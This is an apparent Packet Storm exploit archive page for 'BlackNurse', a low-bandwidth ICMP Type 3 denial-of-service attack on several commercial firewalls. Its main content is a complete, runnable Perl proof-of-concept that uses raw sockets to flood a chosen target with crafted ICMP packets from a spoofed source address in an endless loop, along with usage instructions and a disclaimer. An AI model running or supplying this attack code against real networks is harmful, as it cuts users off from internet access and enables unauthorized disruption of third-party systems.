what you don't know can hurt you

BlackNurse Spoofed ICMP Denial Of Service Proof Of Concept

BlackNurse Spoofed ICMP Denial Of Service Proof Of Concept
Posted Nov 15, 2016
Authored by Todor Donev

Blacknurse is a low bandwidth ICMP attack that is capable of doing denial of service to well known firewalls. Most ICMP attacks that we see are based on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly effective even at low bandwidth. Low bandwidth is in this case around 15-18 Mbit/s. This is to achieve the volume of packets needed which is around 40 to 50K packets per second. It does not matter if you have a 1 Gbit/s Internet connection. The impact we see on different firewalls is typically high CPU loads. When an attack is ongoing, users from the LAN side will no longer be able to send/receive traffic to/from the Internet. All firewalls we have seen recover when the attack stops. Various firewalls such as Cisco ASA 5515/5525/5550/5515-X, Fortigate, SonicWall, and more are affected.

tags | exploit, denial of service
systems | cisco
MD5 | 1ce5fd54e281243721b63900ac937de9

BlackNurse Spoofed ICMP Denial Of Service Proof Of Concept

Change Mirror Download
#!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet |
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
# of service to well known firewalls. Most ICMP attacks that we see are based
# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
# effective even at low bandwidth. Low bandwidth is in this case around 15-18
# Mbit/s. This is to achieve the volume of packets needed which is around 40 to
# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
# connection. The impact we see on different firewalls is typically high CPU
# loads. When an attack is ongoing, users from the LAN side will no longer be
# able to send/receive traffic to/from the Internet. All firewalls we have seen
# recover when the attack stops.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Thanks to Maya (Maiya|Mia) Hristova and all my friends
# that support me.
#
#

use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <spoofed address> <target>\n";
print "[ Example: perl $0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $spoof = $ARGV[0];
my $target = $ARGV[1];

my $sock = new Net::RawIP({ icmp => {} }) or die;

print "[ Sending crafted packets..\n";
while () {
$sock->set({ ip => { saddr => $spoof, daddr => $target},
icmp => { type => 3, code => 3} });
$sock->send;
$sock->set({ icmp => { type=>3, code => 0}});
$sock->send;
$sock->set({ icmp => { type=>3, code => 1}});
$sock->send;
$sock->set({ icmp => { type=>3, code => 2}});
$sock->send;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    0 Files
  • 3
    Apr 3rd
    0 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close